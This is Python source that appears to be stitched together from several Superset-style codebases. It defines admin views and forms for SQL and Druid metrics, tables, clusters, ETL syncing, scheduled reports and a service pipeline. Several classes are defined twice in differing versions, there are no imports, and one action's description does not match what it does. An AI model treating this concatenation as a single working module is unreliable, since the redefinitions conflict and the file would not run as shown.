class SqlMetricInlineView(CompactCRUDMixin, SupersetModelView):
    datamodel = SQLAInterface(models.SqlMetric)
    class_permission_name = "Dataset"
    method_permission_name = MODEL_VIEW_RW_METHOD_PERMISSION_MAP
    include_route_methods = RouteMethod.RELATED_VIEW_SET | RouteMethod.API_SET

    list_title = _("Metrics")
    show_title = _("Show Metric")
    add_title = _("Add Metric")
    edit_title = _("Edit Metric")

    list_columns = ["metric_name", "verbose_name", "metric_type"]
    edit_columns = [
        "metric_name",
        "description",
        "verbose_name",
        "metric_type",
        "expression",
        "table",
        "d3format",
        "extra",
        "warning_text",
    ]
    description_columns = {
        "expression": utils.markdown(
            "a valid, *aggregating* SQL expression as supported by the "
            "underlying backend. Example: `count(DISTINCT userid)`",
            True,
        ),
        "d3format": utils.markdown(
            "d3 formatting string as defined [here]"
            "(https://github.com/d3/d3-format/blob/master/README.md#format). "
            "For instance, this default formatting applies in the Table "
            "visualization and allows different metrics to use different "
            "formats",
            True,
        ),
        "extra": utils.markdown(
            "Extra data to specify metric metadata. Currently supports "
            'metadata of the format: `{ "certification": { "certified_by": '
            '"Data Platform Team", "details": "This metric is the source of truth." '
            '}, "warning_markdown": "This is a warning." }`. This should be modified '
            "from the edit datasource model in Explore to ensure correct formatting.",
            True,
        ),
    }
    add_columns = edit_columns
    page_size = 500
    label_columns = {
        "metric_name": _("Metric"),
        "description": _("Description"),
        "verbose_name": _("Verbose Name"),
        "metric_type": _("Type"),
        "expression": _("SQL Expression"),
        "table": _("Table"),
        "d3format": _("D3 Format"),
        "extra": _("Extra"),
        "warning_text": _("Warning Message"),
    }
    add_form_extra_fields = {
        "table": QuerySelectField(
            "Table",
            query_factory=lambda: db.session.query(models.SqlaTable),
            allow_blank=True,
            widget=Select2Widget(extra_classes="readonly"),
        )
    }
    edit_form_extra_fields = add_form_extra_fields
class TableModelView(  # pylint: disable=too-many-ancestors
    DatasourceModelView, DeleteMixin, YamlExportMixin
):
    datamodel = SQLAInterface(models.SqlaTable)
    include_route_methods = RouteMethod.CRUD_SET

    list_title = _("Tables")
    show_title = _("Show Table")
    add_title = _("Import a table definition")
    edit_title = _("Edit Table")

    list_columns = ["link", "database_name", "changed_by_", "modified"]
    order_columns = ["modified"]
    add_columns = ["database", "schema", "table_name"]
    edit_columns = [
        "table_name",
        "sql",
        "filter_select_enabled",
        "fetch_values_predicate",
        "database",
        "schema",
        "description",
        "owners",
        "main_dttm_col",
        "default_endpoint",
        "offset",
        "cache_timeout",
        "is_sqllab_view",
        "template_params",
        "extra",
    ]
    base_filters = [["id", DatasourceFilter, lambda: []]]
    show_columns = edit_columns + ["perm", "slices"]
    related_views = [TableColumnInlineView, SqlMetricInlineView]
    base_order = ("changed_on", "desc")
    search_columns = ("database", "schema", "table_name", "owners", "is_sqllab_view")
    description_columns = {
        "slices": _(
            "The list of charts associated with this table. By "
            "altering this datasource, you may change how these associated "
            "charts behave. "
            "Also note that charts need to point to a datasource, so "
            "this form will fail at saving if removing charts from a "
            "datasource. If you want to change the datasource for a chart, "
            "overwrite the chart from the 'explore view'"
        ),
        "offset": _("Timezone offset (in hours) for this datasource"),
        "table_name": _("Name of the table that exists in the source database"),
        "schema": _(
            "Schema, as used only in some databases like Postgres, Redshift "
            "and DB2"
        ),
        "description": Markup(
            'Supports <a href="https://daringfireball.net/projects/markdown/">'
            "markdown</a>"
        ),
        "sql": _(
            "This field acts as a Superset view, meaning that Superset will "
            "run a query against this string as a subquery."
        ),
        "fetch_values_predicate": _(
            "Predicate applied when fetching distinct values to "
            "populate the filter control component. Supports "
            "jinja template syntax. Applies only when "
            "`Enable Filter Select` is on."
        ),
        "default_endpoint": _(
            "Redirects to this endpoint when clicking on the table "
            "from the table list"
        ),
        "filter_select_enabled": _(
            "Whether to populate the filter's dropdown in the explore "
            "view's filter section with a list of distinct values fetched "
            "from the backend on the fly"
        ),
        "is_sqllab_view": _(
            "Whether the table was generated by the 'Visualize' flow "
            "in SQL Lab"
        ),
        "template_params": _(
            "A set of parameters that become available in the query using "
            "Jinja templating syntax"
        ),
        "cache_timeout": _(
            "Duration (in seconds) of the caching timeout for this table. "
            "A timeout of 0 indicates that the cache never expires. "
            "Note this defaults to the database timeout if undefined."
        ),
        "extra": utils.markdown(
            "Extra data to specify table metadata. Currently supports "
            'certification data of the format: `{ "certification": { "certified_by": '
            '"Data Platform Team", "details": "This table is the source of truth." '
            "} }`.",
            True,
        ),
    }
    label_columns = {
        "slices": _("Associated Charts"),
        "link": _("Table"),
        "changed_by_": _("Changed By"),
        "database": _("Database"),
        "database_name": _("Database"),
        "changed_on_": _("Last Changed"),
        "filter_select_enabled": _("Enable Filter Select"),
        "schema": _("Schema"),
        "default_endpoint": _("Default Endpoint"),
        "offset": _("Offset"),
        "cache_timeout": _("Cache Timeout"),
        "table_name": _("Table Name"),
        "fetch_values_predicate": _("Fetch Values Predicate"),
        "owners": _("Owners"),
        "main_dttm_col": _("Main Datetime Column"),
        "description": _("Description"),
        "is_sqllab_view": _("SQL Lab View"),
        "template_params": _("Template parameters"),
        "extra": _("Extra"),
        "modified": _("Modified"),
    }
    edit_form_extra_fields = {
        "database": QuerySelectField(
            "Database",
            query_factory=lambda: db.session.query(models.Database),
            widget=Select2Widget(extra_classes="readonly"),
        )
    }

    def pre_add(self, item: "TableModelView") -> None:
        validate_sqlatable(item)

    def post_add(  # pylint: disable=arguments-differ
        self, item: "TableModelView", flash_message: bool = True
    ) -> None:
        item.fetch_metadata()
        create_table_permissions(item)
        if flash_message:
            flash(
                _(
                    "The table was created. "
                    "As part of this two-phase configuration "
                    "process, you should now click the edit button by "
                    "the new table to configure it."
                ),
                "info",
            )

    def post_update(self, item: "TableModelView") -> None:
        self.post_add(item, flash_message=False)

    def _delete(self, pk: int) -> None:
        DeleteMixin._delete(self, pk)

    @expose("/edit/<pk>", methods=["GET", "POST"])
    @has_access
    def edit(self, pk: int) -> FlaskResponse:
        """Simple hack to redirect to explore view after saving"""
        resp = super().edit(pk)
        if isinstance(resp, str):
            return resp
        return redirect("/superset/explore/table/{}/".format(pk))

    @action(
        "refresh", __("Refresh Metadata"), __("Refresh column metadata"), "fa-refresh"
    )
    def refresh(  # pylint: disable=no-self-use, too-many-branches
        self, tables: Union["TableModelView", List["TableModelView"]]
    ) -> FlaskResponse:
        if not isinstance(tables, list):
            tables = [tables]

        @dataclass
        class RefreshResults:
            successes: List[TableModelView] = field(default_factory=list)
            failures: List[TableModelView] = field(default_factory=list)
            added: Dict[str, List[str]] = field(default_factory=dict)
            removed: Dict[str, List[str]] = field(default_factory=dict)
            modified: Dict[str, List[str]] = field(default_factory=dict)

        results = RefreshResults()

        for table_ in tables:
            try:
                metadata_results = table_.fetch_metadata()
                if metadata_results.added:
                    results.added[table_.table_name] = metadata_results.added
                if metadata_results.removed:
                    results.removed[table_.table_name] = metadata_results.removed
                if metadata_results.modified:
                    results.modified[table_.table_name] = metadata_results.modified
                results.successes.append(table_)
            except Exception:  # pylint: disable=broad-except
                results.failures.append(table_)

        if len(results.successes) > 0:
            success_msg = _(
                "Metadata refreshed for the following table(s): %(tables)s",
                tables=", ".join([t.table_name for t in results.successes]),
            )
            flash(success_msg, "info")
        if results.added:
            added_tables = []
            for table, cols in results.added.items():
                added_tables.append(f"{table} ({', '.join(cols)})")
            flash(
                _(
                    "The following tables added new columns: %(tables)s",
                    tables=", ".join(added_tables),
                ),
                "info",
            )
        if results.removed:
            removed_tables = []
            for table, cols in results.removed.items():
                removed_tables.append(f"{table} ({', '.join(cols)})")
            flash(
                _(
                    "The following tables removed columns: %(tables)s",
                    tables=", ".join(removed_tables),
                ),
                "info",
            )
        if results.modified:
            modified_tables = []
            for table, cols in results.modified.items():
                modified_tables.append(f"{table} ({', '.join(cols)})")
            flash(
                _(
                    "The following tables updated column metadata: %(tables)s",
                    tables=", ".join(modified_tables),
                ),
                "info",
            )
        if len(results.failures) > 0:
            failure_msg = _(
                "Unable to refresh metadata for the following table(s): %(tables)s",
                tables=", ".join([t.table_name for t in results.failures]),
            )
            flash(failure_msg, "danger")

        return redirect("/tablemodelview/list/")

    @expose("/list/")
    @has_access
    def list(self) -> FlaskResponse:
        if not is_feature_enabled("ENABLE_REACT_CRUD_VIEWS"):
            return super().list()
        return super().render_app_template()
class DruidClusterModelView(SupersetModelView, DeleteMixin, YamlExportMixin):
    datamodel = SQLAInterface(models.DruidCluster)

    list_title = _("Druid Clusters")
    show_title = _("Show Druid Cluster")
    add_title = _("Add Druid Cluster")
    edit_title = _("Edit Druid Cluster")

    add_columns = [
        "verbose_name",
        "broker_host",
        "broker_port",
        "broker_user",
        "broker_pass",
        "broker_endpoint",
        "cache_timeout",
        "cluster_name",
    ]
    edit_columns = add_columns
    list_columns = ["cluster_name", "metadata_last_refreshed"]
    search_columns = ("cluster_name",)
    label_columns = {
        "cluster_name": _("Cluster"),
        "broker_host": _("Broker Host"),
        "broker_port": _("Broker Port"),
        "broker_user": _("Broker Username"),
        "broker_pass": _("Broker Password"),
        "broker_endpoint": _("Broker Endpoint"),
        "verbose_name": _("Verbose Name"),
        "cache_timeout": _("Cache Timeout"),
        "metadata_last_refreshed": _("Metadata Last Refreshed"),
    }
    description_columns = {
        "cache_timeout": _(
            "Duration (in seconds) of the caching timeout for this cluster. "
            "A timeout of 0 indicates that the cache never expires. "
            "Note this defaults to the global timeout if undefined."
        ),
        "broker_user": _(
            "Druid supports basic authentication. See "
            "[auth](http://druid.io/docs/latest/design/auth.html) and "
            "druid-basic-security extension"
        ),
        "broker_pass": _(
            "Druid supports basic authentication. See "
            "[auth](http://druid.io/docs/latest/design/auth.html) and "
            "druid-basic-security extension"
        ),
    }

    yaml_dict_key = "databases"

    edit_form_extra_fields = {
        "cluster_name": QuerySelectField(
            "Cluster",
            query_factory=lambda: db.session().query(models.DruidCluster),
            widget=Select2Widget(extra_classes="readonly"),
        )
    }

    def pre_add(self, cluster):
        security_manager.add_permission_view_menu("database_access", cluster.perm)

    def pre_update(self, cluster):
        self.pre_add(cluster)

    def _delete(self, pk):
        DeleteMixin._delete(self, pk)
class DruidMetricInlineView(CompactCRUDMixin, SupersetModelView):  # noqa
    datamodel = SQLAInterface(models.DruidMetric)

    list_title = _("Metrics")
    show_title = _("Show Druid Metric")
    add_title = _("Add Druid Metric")
    edit_title = _("Edit Druid Metric")

    list_columns = ["metric_name", "verbose_name", "metric_type"]
    edit_columns = [
        "metric_name",
        "description",
        "verbose_name",
        "metric_type",
        "json",
        "datasource",
        "d3format",
        "is_restricted",
        "warning_text",
    ]
    add_columns = edit_columns
    page_size = 500
    validators_columns = {"json": [validate_json]}
    description_columns = {
        "metric_type": utils.markdown(
            "use `postagg` as the metric type if you are defining a "
            "[Druid Post Aggregation]"
            "(http://druid.io/docs/latest/querying/post-aggregations.html)",
            True,
        ),
        "is_restricted": _(
            "Whether access to this metric is restricted "
            "to certain roles. Only roles with the permission "
            "'metric access on XXX (the name of this metric)' "
            "are allowed to access this metric"
        ),
    }
    label_columns = {
        "metric_name": _("Metric"),
        "description": _("Description"),
        "verbose_name": _("Verbose Name"),
        "metric_type": _("Type"),
        "json": _("JSON"),
        "datasource": _("Druid Datasource"),
        "warning_text": _("Warning Message"),
        "is_restricted": _("Is Restricted"),
    }
    add_form_extra_fields = {
        "datasource": QuerySelectField(
            "Datasource",
            query_factory=lambda: db.session().query(models.DruidDatasource),
            allow_blank=True,
            widget=Select2Widget(extra_classes="readonly"),
        )
    }
    edit_form_extra_fields = add_form_extra_fields

    def post_add(self, metric):
        if metric.is_restricted:
            security_manager.add_permission_view_menu(
                "metric_access", metric.get_perm()
            )

    def post_update(self, metric):
        if metric.is_restricted:
            security_manager.add_permission_view_menu(
                "metric_access", metric.get_perm()
            )
class ReportForm(DynamicForm):
    report_id = HiddenField()
    schedule_timezone = HiddenField()
    report_title = StringField(
        ("Title"),
        description="Title will be used as the report's name",
        widget=BS3TextFieldWidget(),
        validators=[DataRequired()],
    )
    description = TextAreaField(
        ("Description"),
        widget=BS3TextAreaFieldWidget(),
        validators=[DataRequired()],
    )
    owner_name = StringField(
        ("Owner Name"),
        widget=BS3TextFieldWidget(),
        validators=[DataRequired()],
    )
    owner_email = StringField(
        ("Owner Email"),
        description="Owner email will be added to the subscribers list",
        widget=BS3TextFieldWidget(),
        validators=[DataRequired(), Email()],
    )
    subscribers = StringField(
        ("Subscribers"),
        description=(
            "List of comma-separated emails that should receive email "
            "notifications. Automatically adds owner email to this list."
        ),
        widget=BS3TextFieldWidget(),
    )
    tests = SelectMultipleField(
        ("Tests"),
        description=(
            "List of the tests to include in the report. Only includes "
            "tasks that have run in airflow."
        ),
        choices=None,
        widget=Select2ManyWidget(),
        validators=[DataRequired()],
    )
    schedule_type = SelectField(
        ("Schedule"),
        description=("Select how you want to schedule the report"),
        choices=[
            ("manual", "None (Manual triggering)"),
            ("daily", "Daily"),
            ("weekly", "Weekly"),
            ("custom", "Custom (Cron)"),
        ],
        widget=Select2Widget(),
        validators=[DataRequired()],
    )
    schedule_time = TimeField(
        "Time",
        description=(
            "Note that the time zone being used is the "
            "selected timezone in your clock interface."
        ),
        render_kw={"class": "form-control"},
        validators=[DataRequired()],
    )
    schedule_week_day = SelectField(
        ("Day of week"),
        description=("Select the day of the week you want to schedule the report"),
        choices=[
            ("0", "Sunday"),
            ("1", "Monday"),
            ("2", "Tuesday"),
            ("3", "Wednesday"),
            ("4", "Thursday"),
            ("5", "Friday"),
            ("6", "Saturday"),
        ],
        widget=Select2Widget(),
        validators=[DataRequired()],
    )
    schedule_custom = StringField(
        ("Cron schedule"),
        description=(
            'Enter a cron schedule (e.g. "0 0 * * *"). '
            "Note that the time zone being used is UTC."
        ),
        widget=BS3TextFieldWidget(),
        validators=[DataRequired()],
    )
class EtlTableView(SupersetModelView, DeleteMixin):
    """View For EtlTable Model."""

    datamodel = SQLAInterface(EtlTable)

    list_columns = [
        'connector.type', 'connector.name', 'table.database', 'table',
        'datasource', 'sql_table_name', 'downloaded_rows', 'progress',
        'sync_last', 'sync_last_time', 'status', 'save_in_prt', 'sync_field',
        'repr_sync_periodic', 'sync_next_time', 'is_valid', 'is_active',
        'is_scheduled',
        # 'table.sql',
    ]
    add_columns = [
        'connector', 'table', 'datasource', 'name', 'save_in_prt',
        'calculate_progress', 'sync_field', 'sync_last', 'chunk_size',
        'sync_periodic', 'sync_periodic_hour',
    ]
    edit_schema = ['schema']
    edit_columns = [
        'calculate_progress', 'save_in_prt', 'sync_field', 'sync_last',
        'chunk_size', 'sync_periodic', 'sync_periodic_hour', 'is_active',
    ]
    # edit_columns = add_columns + ['sync_last_time', 'sync_next_time']
    label_columns = {
        'table.database': 'Instance',
        'connector': 'DataSource Connector',
        'table': 'DataSource SQLTable',
        'name': '_etl_{name}',
    }
    description_columns = {
        'table': _('<a href="/tablemodelview/list/">Create table </a>'),
    }
    etl_extra_fields = {
        # 'datasource': AJAXSelectField('Extra Field2',
        #     description='Extra Field description',
        #     datamodel=datamodel,
        #     col_name='datasource',
        #     widget=Select2AJAXWidget(
        #         endpoint='/connectorview/api/column/add/datasource')),
        # 'datasource': AJAXSelectField('Extra Field2',
        #     description='Extra Field description',
        #     datamodel=datamodel,
        #     col_name='reports',
        #     widget=Select2SlaveAJAXWidget(
        #         master_id='connector',
        #         endpoint='/appsflyerconnectorview/api/read?_flt_0_id={{ID}}')),
        'sync_periodic': SelectField(
            choices=EtlPeriod.CHOICES,
            widget=Select2Widget(),
            coerce=int),
        'sync_periodic_hour': SelectField(
            choices=EtlPeriod.HOURS,
            widget=Select2Widget(),
            coerce=int,
            description=_('Use if you select one of [Once a month, '
                          'Once a week, Once a day] Sync Periodic')),
    }
    add_form_extra_fields = etl_extra_fields
    edit_form_extra_fields = etl_extra_fields
    # etl_extra_fields = {'schema': StringField(widget=BS3TextFieldROWidget())}
    # related_views = [TableColumnInlineView]

    # actions
    @action('sync_etl', 'Sync', 'Sync data for this table', 'fa-play')
    def sync(self, item):
        """Call sync etl."""
        item[0].sync_delay()
        return redirect('/etltableview/list/')

    @action('re_sync_etl', 'ReSync',
            'Clear data, and get new data for this table', 'fa-repeat')
    def re_sync(self, item):
        """Call ReSync etl."""
        item[0].clear()
        item[0].sync_delay()
        return redirect('/etltableview/list/')

    @action('check_sql', 'Check_sql', 'Stop sync data and clear data', 'fa-check')
    def check_sql(self, item):
        """Call stop etl."""
        print(item[0].remote_etl_sql())
        return redirect('/etltableview/list/')

    @action('sync_etl_once', 'Sync once', 'Sync data for this table',
            'fa-step-forward')
    def sync_once(self, item):
        """Call test_sync_etl."""
        item[0].sync_once()
        return redirect('/etltableview/list/')

    @action('sync_etl_stop', 'Sync stop', 'Stop sync data for this table',
            'fa-stop')
    def sync_stop(self, item):
        """Call stop etl."""
        item[0].stop()
        return redirect('/etltableview/list/')

    @action('clear_etl', 'Clear', 'Stop sync data and clear data', 'fa-trash-o')
    def clear_etl(self, item):
        """Call stop etl."""
        item[0].clear()
        return redirect('/etltableview/list/')

    def pre_add(self, obj):
        """Check data before save."""
        if obj.name == '':
            raise Exception('Enter a table name')
        obj.create_table()
        obj.sync_next_time = obj.get_next_sync()

    def pre_update(self, obj):
        obj.sync_next_time = obj.get_next_sync()

    def pre_delete(self, obj):
        logging.info('pre_delete')
        if obj.exist_table():
            obj.delete_table()
class DruidDatasourceModelView(DatasourceModelView, DeleteMixin, YamlExportMixin):
    datamodel = SQLAInterface(models.DruidDatasource)
    include_route_methods = RouteMethod.CRUD_SET

    list_title = _("Druid Datasources")
    show_title = _("Show Druid Datasource")
    add_title = _("Add Druid Datasource")
    edit_title = _("Edit Druid Datasource")

    list_columns = ["datasource_link", "cluster", "changed_by_", "modified"]
    order_columns = ["datasource_link", "modified"]
    related_views = [DruidColumnInlineView, DruidMetricInlineView]
    edit_columns = [
        "datasource_name",
        "cluster",
        "description",
        "owners",
        "is_hidden",
        "filter_select_enabled",
        "fetch_values_from",
        "default_endpoint",
        "offset",
        "cache_timeout",
    ]
    search_columns = ("datasource_name", "cluster", "description", "owners")
    add_columns = edit_columns
    show_columns = add_columns + ["perm", "slices"]
    page_size = 500
    base_order = ("datasource_name", "asc")
    description_columns = {
        "slices": _(
            "The list of charts associated with this table. By "
            "altering this datasource, you may change how these associated "
            "charts behave. "
            "Also note that charts need to point to a datasource, so "
            "this form will fail at saving if removing charts from a "
            "datasource. If you want to change the datasource for a chart, "
            "overwrite the chart from the 'explore view'"
        ),
        "offset": _("Timezone offset (in hours) for this datasource"),
        "description": Markup(
            'Supports <a href="'
            'https://daringfireball.net/projects/markdown/">markdown</a>'
        ),
        "fetch_values_from": _(
            "Time expression to use as a predicate when retrieving "
            "distinct values to populate the filter component. "
            "Only applies when `Enable Filter Select` is on. If "
            "you enter `7 days ago`, the distinct list of values in "
            "the filter will be populated based on the distinct value over "
            "the past week"
        ),
        "filter_select_enabled": _(
            "Whether to populate the filter's dropdown in the explore "
            "view's filter section with a list of distinct values fetched "
            "from the backend on the fly"
        ),
        "default_endpoint": _(
            "Redirects to this endpoint when clicking on the datasource "
            "from the datasource list"
        ),
        "cache_timeout": _(
            "Duration (in seconds) of the caching timeout for this datasource. "
            "A timeout of 0 indicates that the cache never expires. "
            "Note this defaults to the cluster timeout if undefined."
        ),
    }
    base_filters = [["id", DatasourceFilter, lambda: []]]
    label_columns = {
        "slices": _("Associated Charts"),
        "datasource_link": _("Data Source"),
        "cluster": _("Cluster"),
        "description": _("Description"),
        "owners": _("Owners"),
        "is_hidden": _("Is Hidden"),
        "filter_select_enabled": _("Enable Filter Select"),
        "default_endpoint": _("Default Endpoint"),
        "offset": _("Time Offset"),
        "cache_timeout": _("Cache Timeout"),
        "datasource_name": _("Datasource Name"),
        "fetch_values_from": _("Fetch Values From"),
        "changed_by_": _("Changed By"),
        "modified": _("Modified"),
    }
    edit_form_extra_fields = {
        "cluster": QuerySelectField(
            "Cluster",
            query_factory=lambda: db.session.query(models.DruidCluster),
            widget=Select2Widget(extra_classes="readonly"),
        ),
        "datasource_name": StringField(
            "Datasource Name", widget=BS3TextFieldROWidget()
        ),
    }

    def pre_add(self, item: "DruidDatasourceModelView") -> None:
        with db.session.no_autoflush:
            query = db.session.query(models.DruidDatasource).filter(
                models.DruidDatasource.datasource_name == item.datasource_name,
                models.DruidDatasource.cluster_id == item.cluster_id,
            )
            if db.session.query(query.exists()).scalar():
                raise Exception(get_datasource_exist_error_msg(item.full_name))

    def post_add(self, item: "DruidDatasourceModelView") -> None:
        item.refresh_metrics()
        security_manager.add_permission_view_menu("datasource_access", item.get_perm())
        if item.schema:
            security_manager.add_permission_view_menu("schema_access", item.schema_perm)

    def post_update(self, item: "DruidDatasourceModelView") -> None:
        self.post_add(item)

    def _delete(self, pk: int) -> None:
        DeleteMixin._delete(self, pk)
class DruidColumnInlineView(CompactCRUDMixin, SupersetModelView):  # noqa
    datamodel = SQLAInterface(models.DruidColumn)

    list_title = _('Columns')
    show_title = _('Show Druid Column')
    add_title = _('Add Druid Column')
    edit_title = _('Edit Druid Column')

    list_widget = ListWidgetWithCheckboxes

    edit_columns = [
        'column_name', 'verbose_name', 'description', 'dimension_spec_json',
        'datasource', 'groupby', 'filterable']
    add_columns = edit_columns
    list_columns = ['column_name', 'verbose_name', 'type', 'groupby', 'filterable']
    can_delete = False
    page_size = 500
    label_columns = {
        'column_name': _('Column'),
        'type': _('Type'),
        'datasource': _('Datasource'),
        'groupby': _('Groupable'),
        'filterable': _('Filterable'),
    }
    description_columns = {
        'filterable': _(
            'Whether this column is exposed in the `Filters` section '
            'of the explore view.'),
        'dimension_spec_json': utils.markdown(
            'this field can be used to specify '
            'a `dimensionSpec` as documented [here]'
            '(http://druid.io/docs/latest/querying/dimensionspecs.html). '
            'Make sure to input valid JSON and that the '
            '`outputName` matches the `column_name` defined '
            'above.',
            True),
    }
    add_form_extra_fields = {
        'datasource': QuerySelectField(
            'Datasource',
            query_factory=lambda: db.session().query(models.DruidDatasource),
            allow_blank=True,
            widget=Select2Widget(extra_classes='readonly'),
        ),
    }
    edit_form_extra_fields = add_form_extra_fields

    def pre_update(self, col):
        # If a dimension spec JSON is given, ensure that it is
        # valid JSON and that `outputName` is specified
        if col.dimension_spec_json:
            try:
                dimension_spec = json.loads(col.dimension_spec_json)
            except ValueError as e:
                raise ValueError('Invalid Dimension Spec JSON: ' + str(e))
            if not isinstance(dimension_spec, dict):
                raise ValueError('Dimension Spec must be a JSON object')
            if 'outputName' not in dimension_spec:
                raise ValueError('Dimension Spec does not contain `outputName`')
            if 'dimension' not in dimension_spec:
                raise ValueError('Dimension Spec is missing `dimension`')
            # `outputName` should be the same as the `column_name`
            if dimension_spec['outputName'] != col.column_name:
                raise ValueError(
                    '`outputName` [{}] unequal to `column_name` [{}]'.format(
                        dimension_spec['outputName'], col.column_name))

    def post_update(self, col):
        col.refresh_metrics()

    def post_add(self, col):
        self.post_update(col)
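# Illustrative only: a minimal `dimension_spec_json` value that would pass the
# `pre_update` checks in DruidColumnInlineView above -- it is valid JSON, is an
# object, and carries both `dimension` and an `outputName` equal to the
# column's `column_name` ("country" and "country_iso" are made-up names).
EXAMPLE_DIMENSION_SPEC_JSON = """
{
    "type": "default",
    "dimension": "country_iso",
    "outputName": "country"
}
"""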
class SqlMetricInlineView(CompactCRUDMixin, SupersetModelView):  # noqa
    datamodel = SQLAInterface(models.SqlMetric)

    list_title = _("Metrics")
    show_title = _("Show Metric")
    add_title = _("Add Metric")
    edit_title = _("Edit Metric")

    list_columns = ["metric_name", "verbose_name", "metric_type"]
    edit_columns = [
        "metric_name",
        "description",
        "verbose_name",
        "metric_type",
        "expression",
        "table",
        "d3format",
        "is_restricted",
        "warning_text",
    ]
    description_columns = {
        "expression": utils.markdown(
            "a valid, *aggregating* SQL expression as supported by the "
            "underlying backend. Example: `count(DISTINCT userid)`",
            True,
        ),
        "is_restricted": _(
            "Whether access to this metric is restricted "
            "to certain roles. Only roles with the permission "
            "'metric access on XXX (the name of this metric)' "
            "are allowed to access this metric"
        ),
        "d3format": utils.markdown(
            "d3 formatting string as defined [here]"
            "(https://github.com/d3/d3-format/blob/master/README.md#format). "
            "For instance, this default formatting applies in the Table "
            "visualization and allows different metrics to use different "
            "formats",
            True,
        ),
    }
    add_columns = edit_columns
    page_size = 500
    label_columns = {
        "metric_name": _("Metric"),
        "description": _("Description"),
        "verbose_name": _("Verbose Name"),
        "metric_type": _("Type"),
        "expression": _("SQL Expression"),
        "table": _("Table"),
        "d3format": _("D3 Format"),
        "is_restricted": _("Is Restricted"),
        "warning_text": _("Warning Message"),
    }
    add_form_extra_fields = {
        "table": QuerySelectField(
            "Table",
            query_factory=lambda: db.session().query(models.SqlaTable),
            allow_blank=True,
            widget=Select2Widget(extra_classes="readonly"),
        )
    }
    edit_form_extra_fields = add_form_extra_fields

    def post_add(self, metric):
        if metric.is_restricted:
            security_manager.add_permission_view_menu(
                "metric_access", metric.get_perm()
            )

    def post_update(self, metric):
        if metric.is_restricted:
            security_manager.add_permission_view_menu(
                "metric_access", metric.get_perm()
            )
class DruidMetricInlineView(CompactCRUDMixin, SupersetModelView):  # noqa
    datamodel = SQLAInterface(models.DruidMetric)

    list_title = _('Metrics')
    show_title = _('Show Druid Metric')
    add_title = _('Add Druid Metric')
    edit_title = _('Edit Druid Metric')

    list_columns = ['metric_name', 'verbose_name', 'metric_type']
    edit_columns = [
        'metric_name', 'description', 'verbose_name', 'metric_type', 'json',
        'datasource', 'd3format', 'is_restricted', 'warning_text']
    add_columns = edit_columns
    page_size = 500
    validators_columns = {
        'json': [validate_json],
    }
    description_columns = {
        'metric_type': utils.markdown(
            'use `postagg` as the metric type if you are defining a '
            '[Druid Post Aggregation]'
            '(http://druid.io/docs/latest/querying/post-aggregations.html)',
            True),
        'is_restricted': _('Whether access to this metric is restricted '
                           'to certain roles. Only roles with the permission '
                           "'metric access on XXX (the name of this metric)' "
                           'are allowed to access this metric'),
    }
    label_columns = {
        'metric_name': _('Metric'),
        'description': _('Description'),
        'verbose_name': _('Verbose Name'),
        'metric_type': _('Type'),
        'json': _('JSON'),
        'datasource': _('Druid Datasource'),
        'warning_text': _('Warning Message'),
        'is_restricted': _('Is Restricted'),
    }
    add_form_extra_fields = {
        'datasource': QuerySelectField(
            'Datasource',
            query_factory=lambda: db.session().query(models.DruidDatasource),
            allow_blank=True,
            widget=Select2Widget(extra_classes='readonly'),
        ),
    }
    edit_form_extra_fields = add_form_extra_fields

    def post_add(self, metric):
        if metric.is_restricted:
            security_manager.add_permission_view_menu(
                'metric_access', metric.get_perm())

    def post_update(self, metric):
        if metric.is_restricted:
            security_manager.add_permission_view_menu(
                'metric_access', metric.get_perm())
class DruidClusterModelView(SupersetModelView, DeleteMixin, YamlExportMixin):  # noqa
    datamodel = SQLAInterface(models.DruidCluster)

    list_title = _('Druid Clusters')
    show_title = _('Show Druid Cluster')
    add_title = _('Add Druid Cluster')
    edit_title = _('Edit Druid Cluster')

    add_columns = [
        'verbose_name', 'broker_host', 'broker_port', 'broker_user',
        'broker_pass', 'broker_endpoint', 'cache_timeout', 'cluster_name',
    ]
    edit_columns = add_columns
    list_columns = ['cluster_name', 'metadata_last_refreshed']
    search_columns = ('cluster_name',)
    label_columns = {
        'cluster_name': _('Cluster'),
        'broker_host': _('Broker Host'),
        'broker_port': _('Broker Port'),
        'broker_user': _('Broker Username'),
        'broker_pass': _('Broker Password'),
        'broker_endpoint': _('Broker Endpoint'),
        'verbose_name': _('Verbose Name'),
        'cache_timeout': _('Cache Timeout'),
        'metadata_last_refreshed': _('Metadata Last Refreshed'),
    }
    description_columns = {
        'cache_timeout': _(
            'Duration (in seconds) of the caching timeout for this cluster. '
            'A timeout of 0 indicates that the cache never expires. '
            'Note this defaults to the global timeout if undefined.'),
        'broker_user': _(
            'Druid supports basic authentication. See '
            '[auth](http://druid.io/docs/latest/design/auth.html) and '
            'druid-basic-security extension'),
        'broker_pass': _(
            'Druid supports basic authentication. See '
            '[auth](http://druid.io/docs/latest/design/auth.html) and '
            'druid-basic-security extension'),
    }

    edit_form_extra_fields = {
        'cluster_name': QuerySelectField(
            'Cluster',
            query_factory=lambda: db.session().query(models.DruidCluster),
            widget=Select2Widget(extra_classes='readonly'),
        ),
    }

    def pre_add(self, cluster):
        security_manager.add_permission_view_menu('database_access', cluster.perm)

    def pre_update(self, cluster):
        self.pre_add(cluster)

    def _delete(self, pk):
        DeleteMixin._delete(self, pk)
class Service_Pipeline_ModelView_Base():
    label_title = 'task flow'
    datamodel = SQLAInterface(Service_Pipeline)
    check_redirect_list_url = '/service_pipeline_modelview/list/'

    base_permissions = ['can_show', 'can_edit', 'can_list', 'can_delete', 'can_add']
    base_order = ("changed_on", "desc")
    # order_columns = ['id', 'changed_on']
    order_columns = ['id']
    list_columns = ['project', 'service_pipeline_url', 'creator', 'modified', 'operate_html']
    add_columns = ['project', 'name', 'describe', 'namespace', 'images', 'env',
                   'resource_memory', 'resource_cpu', 'resource_gpu', 'replicas',
                   'dag_json', 'alert_status', 'alert_user', 'parameter']
    show_columns = ['project', 'name', 'describe', 'namespace', 'run_id',
                    'created_by', 'changed_by', 'created_on', 'changed_on',
                    'expand_html', 'parameter_html']
    edit_columns = add_columns
    base_filters = [["id", Service_Pipeline_Filter, lambda: []]]  # permission filter
    conv = GeneralModelConverter(datamodel)

    add_form_extra_fields = {
        "name": StringField(
            _(datamodel.obj.lab('name')),
            description="English name (letters, digits and '-'), at most 50 characters",
            widget=BS3TextFieldWidget(),
            validators=[Regexp(r"^[a-z][a-z0-9\-]*[a-z0-9]$"), Length(1, 54), DataRequired()]),
        "project": QuerySelectField(
            _(datamodel.obj.lab('project')),
            query_factory=filter_join_org_project,
            allow_blank=True,
